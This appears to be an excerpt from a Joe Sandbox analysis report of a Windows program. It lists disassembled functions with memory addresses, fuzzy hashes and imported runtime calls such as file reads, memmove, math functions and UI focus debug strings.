Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568432672da2b5e3b71522abb947d1038ca6fe54e53f96fdf144140440857443
Instruction ID: f4ff146e0e34db29ba440d311e8deef872e7148da7e28bdecaa0be3a2cd43d60
Opcode Fuzzy Hash: 568432672da2b5e3b71522abb947d1038ca6fe54e53f96fdf144140440857443
Instruction Fuzzy Hash: DCD10732D48386CAE376CB3A80443F976B8EF05798F198775F798921D5EF3925869B00

Function 00007FF69DCD402D Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: d603e8560dd539b0674b2c27fa507bcc0bcac951e9502cf2d9abece34ff9ef1a
Instruction ID: 6538f90db0503cb6f9ec8243ad3818a31ba0bc9209492f0ada1bf26a8dc1d6ef
Opcode Fuzzy Hash: d603e8560dd539b0674b2c27fa507bcc0bcac951e9502cf2d9abece34ff9ef1a
Instruction Fuzzy Hash: 01D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80

Function 00007FF69DCD4029 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: 60f2721d05200247fd25671ff5ea3d876fb5463af271928a62ef400d67ea17ff
Instruction ID: ac584ff1449c29b4bc0b676e8a2974847deef9a8477d575be69690637cd727f3
Opcode Fuzzy Hash: 60f2721d05200247fd25671ff5ea3d876fb5463af271928a62ef400d67ea17ff
Instruction Fuzzy Hash: 00D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80

Function 00007FF69DCD4025 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: 47ef7138cfe2c6e482ebbbabfc3e9d2c87969d3b008b92bfe8c3789ac3077a17
Instruction ID: aa44aed13a118e2944cbcf4261dc3e89b57c1a6e278ad206d45645e41a8ff4db
Opcode Fuzzy Hash: 47ef7138cfe2c6e482ebbbabfc3e9d2c87969d3b008b92bfe8c3789ac3077a17
Instruction Fuzzy Hash: 61D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80

Function 00007FF69DCD4021 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: 08f12f895f1a86b423fb7f6b9adf37630ca4a3607632c4ed8bc69a08357a92b4
Instruction ID: 3773a5aeb0eba2e1f75802519a55c81e4567016af8a5525bace59eb83dfd67df
Opcode Fuzzy Hash: 08f12f895f1a86b423fb7f6b9adf37630ca4a3607632c4ed8bc69a08357a92b4
Instruction Fuzzy Hash: 38D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80

Function 00007FF69DCD401D Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: 5a911eeea5698123807b09c17864601424d26220484e379dfdcec5013934b7cf
Instruction ID: c878242639a62d9d675c0ae7d1365f5c35a8f4a3fcaf830f7810853d71bcbb73
Opcode Fuzzy Hash: 5a911eeea5698123807b09c17864601424d26220484e379dfdcec5013934b7cf
Instruction Fuzzy Hash: E3D1A872A09B419AE710CF55E48079EB7B9FB84348F50127AEACC57B68EF78D154CB80

Function 00007FF69DCD4019 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: 7a6b30409e87032ff010e302a9ca90a44832794ce0364282de9db72c075e77c0
Instruction ID: 49bf466f3e10b12451411b42079f1be8bf46f16dfe3831250a59a041c11331de
Opcode Fuzzy Hash: 7a6b30409e87032ff010e302a9ca90a44832794ce0364282de9db72c075e77c0
Instruction Fuzzy Hash: F4D19872A09B419AE7108F55E48079EB7B9FB84348F501276EACC57B68EF78D154CB40

Function 00007FF69DCFDF80 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 337159654cfbe62c379e17175d0845e6585348c255179325ee0b5cd5b807ab09
Instruction ID: a95e8eacae181bb4df3a92d106ef41a1663d55049b70ab15820d91be8aec39a8
Opcode Fuzzy Hash: 337159654cfbe62c379e17175d0845e6585348c255179325ee0b5cd5b807ab09
Instruction Fuzzy Hash: CDA1C132A18AD4CAE711CF7E80412FCBBB4FB59349F155335EE8532A65DB386586DB00

Function 00007FF69DCFB8A0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction ID: 33bdbc1db3c5c766863085d8333cf10f29ebcbcc01a96b8579a7a2e77e7bcbd5
Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction Fuzzy Hash: 1851EBA66244B187DA608F2ED4816BC3BA1E745743FD484B6D699C2F51D63DC10BEF20

Function 00007FF69DCE5D10 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9fb49b62c65e024d0e2afc8e88561ce0de7a38d0c74c8b5e211e9945fc1fa4b
Instruction ID: 9795affd6bffeaa1a2315bdec7dd52ad60977c0e9d87f9da0c0d7a14909e5922
Opcode Fuzzy Hash: d9fb49b62c65e024d0e2afc8e88561ce0de7a38d0c74c8b5e211e9945fc1fa4b
Instruction Fuzzy Hash: 034128B2B201F95FEA98C6665824F3D7F51D3D2742789A606FF8027D48C13C9612DBA0

Function 00007FF69DCDF450 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a19aad8a692dbb4a87b1410e9d490f89fc902783b6ee00e8b7df0b35a0b99771
Instruction ID: b9f4a3d4b159512643348e3f53e76e243dc8652d9b00aabe7434c3c31103a47a
Opcode Fuzzy Hash: a19aad8a692dbb4a87b1410e9d490f89fc902783b6ee00e8b7df0b35a0b99771
Instruction Fuzzy Hash: C751E536610A8582DB54CF2AE554BAE6761FB8DF88F49A132DF4E03B28DF39D0548B00

Function 00007FF69DD093B0 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5ad9cfef8fb6cdb00968b64ec9f9d2b4eb2d1419fd3eb04d3a27f44c570c0d1
Instruction ID: 14d10db7644ba6e0a48e05173c62583efaf10d51108459f9b3d05eef1953c7b2
Opcode Fuzzy Hash: a5ad9cfef8fb6cdb00968b64ec9f9d2b4eb2d1419fd3eb04d3a27f44c570c0d1
Instruction Fuzzy Hash: 8D413421E0D25A46E9318D23D08017EA655EFEABC0F5DD772ED8C676D4EF38E48A8704

Function 00007FF69DCE5C60 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1822a51eddc2b1b11f08983a1d5ab9f69a5efd01c1037a88392c8b7f74b1ded
Instruction ID: 0f439beae5706f2c19d5a8f6013b33966681548e7723d7ae90e7f25d4f9f5b9d
Opcode Fuzzy Hash: d1822a51eddc2b1b11f08983a1d5ab9f69a5efd01c1037a88392c8b7f74b1ded
Instruction Fuzzy Hash: CE0128617006A287DB28CA66C4F057933A0F3D9B82B91213FDF4D8B644EE3CA665C720

Function 00007FF69DCE3050 Relevance: 15.1, APIs: 10, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE3097
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE30B3
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE30C4
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE30DE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE3103
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE311F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE312D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE3148
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE3150
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE3166

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: fclose$fseekftell$freadfreemalloc
String ID:
API String ID: 1549146309-0
Opcode ID: 8f4ad808eefabd7f849b8c6cecd0f2031373ecdfddbfddee00826a90e0b1bee3
Instruction ID: 61678827095886df82eab89ae93fcddbcd45d50a394f3f590dc8b7c082bbfaa3
Opcode Fuzzy Hash: 8f4ad808eefabd7f849b8c6cecd0f2031373ecdfddbfddee00826a90e0b1bee3
Instruction Fuzzy Hash: 50318060B08642C1EA748B56A94523962A4FF45FD5F0862B9DD9EC37E4FE3CF8074390

Function 00007FF69DD05F50 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 258COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140 ref: 00007FF69DD0606C
memmove.VCRUNTIME140 ref: 00007FF69DD060A5
memmove.VCRUNTIME140 ref: 00007FF69DD061EC
memmove.VCRUNTIME140 ref: 00007FF69DD0620C
memcmp.VCRUNTIME140 ref: 00007FF69DD062AA

Strings

##Background, xrefs: 00007FF69DD05F59
, xrefs: 00007FF69DD06129
, xrefs: 00007FF69DD06008

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memmove$memcmp
String ID: $ $##Background
API String ID: 845337883-670043462
Opcode ID: 93f4ad55297f18cab66897378871b483fc16f6ad06b91759777d162fa0c9eb9b
Instruction ID: 31d45783dc00aaf84b6fc76f7570377499fcb3a12273e4dee136a7b7b9051647
Opcode Fuzzy Hash: 93f4ad55297f18cab66897378871b483fc16f6ad06b91759777d162fa0c9eb9b
Instruction Fuzzy Hash: 75B1CE72B04A4287DB24CF19D44476D77A5FB84BC4F06A23ADB8987781EF38E889C740

Function 00007FF69DCD2D80 Relevance: 12.2, APIs: 8, Instructions: 168COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF69DCD2DEA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD2E70
memmove.VCRUNTIME140 ref: 00007FF69DCD2E96
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69DCD2EBA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD2F18
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD2F5B
?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF69DCD2F79
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF69DCD2F86

Part of subcall function 00007FF69DD1CF50: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000100000000,00007FF69DCD2E7C), ref: 00007FF69DD1CF6A

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove$?uncaught_exceptions@std@@Concurrency::cancel_current_taskD@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@malloc
String ID:
API String ID: 4241033127-0
Opcode ID: f2517795b2b689b49bc800c2c93248c90c7633444fc8ed0f130adc92bf444e98
Instruction ID: 5c307777cdc476501c4661f1a547c1064ecd13df5c47c731fadad405095ddfa6
Opcode Fuzzy Hash: f2517795b2b689b49bc800c2c93248c90c7633444fc8ed0f130adc92bf444e98
Instruction Fuzzy Hash: D451F762B49745C1EE289B26E840378A2A5EB45FB5F144771DABD877D0EF3CE4838340

Function 00007FF69DCEE6F0 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 316COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF69DCEE8E5
memmove.VCRUNTIME140 ref: 00007FF69DCEE912
memmove.VCRUNTIME140 ref: 00007FF69DCEEBD8

Strings

<NULL>, xrefs: 00007FF69DCEE7EF, 00007FF69DCEE811
[focus] SetNavWindow("%s"), xrefs: 00007FF69DCEE92A
[focus] FocusWindow("%s", UnlessBelowModal): prevented by "%s"., xrefs: 00007FF69DCEE81C
[popup] ClosePopupsOverWindow("%s"), xrefs: 00007FF69DCEEA7C

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memmove
String ID: <NULL>$[focus] FocusWindow("%s", UnlessBelowModal): prevented by "%s".$[focus] SetNavWindow("%s")$[popup] ClosePopupsOverWindow("%s")
API String ID: 2162964266-3417935506
Opcode ID: 1d6e818e2bc5564d26da3eb178b209d5f21fac3db4005242ee915ea67d98fc86
Instruction ID: 3ce3bedec7b8b2fdc4ce312ef92f576f29635b362c9c5ea876aa143b09c81f72
Opcode Fuzzy Hash: 1d6e818e2bc5564d26da3eb178b209d5f21fac3db4005242ee915ea67d98fc86
Instruction Fuzzy Hash: 5BE1D2A2A09BD2C5EB358F15D4466F867BDFB40BC8F054576CA8D87B94EF38E9428310

Function 00007FF69DD04690 Relevance: 10.8, APIs: 7, Instructions: 264COMMON

Download Yara Rule

APIs

ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD047F0
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD04805
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD048DF
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD048F8
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD0499B
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD049B3
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD04A81

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: ceilf$cosfsinf
String ID:
API String ID: 125261001-0
Opcode ID: 32bfb191c3948eaa3645c8aa4b69d698d7bb7f47e35243ca32e243e3aa410ec7
Instruction ID: d45c041fc49d0716e7191f3caa3eeeebd1ea975f65a7f4414075114add88794f
Opcode Fuzzy Hash: 32bfb191c3948eaa3645c8aa4b69d698d7bb7f47e35243ca32e243e3aa410ec7
Instruction Fuzzy Hash: E4B1FD32D2868585D232873AD5416B9B350FF9D385F18A732E9C9B3665FF2CB4D98B00

Function 00007FF69DCD87D0 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF), ref: 00007FF69DCD8864
memmove.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF), ref: 00007FF69DCD88A8
memmove.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF), ref: 00007FF69DCD88C0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,7FFFFFFFFFFFFFFF), ref: 00007FF69DCD8948
memmove.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF), ref: 00007FF69DCD8975
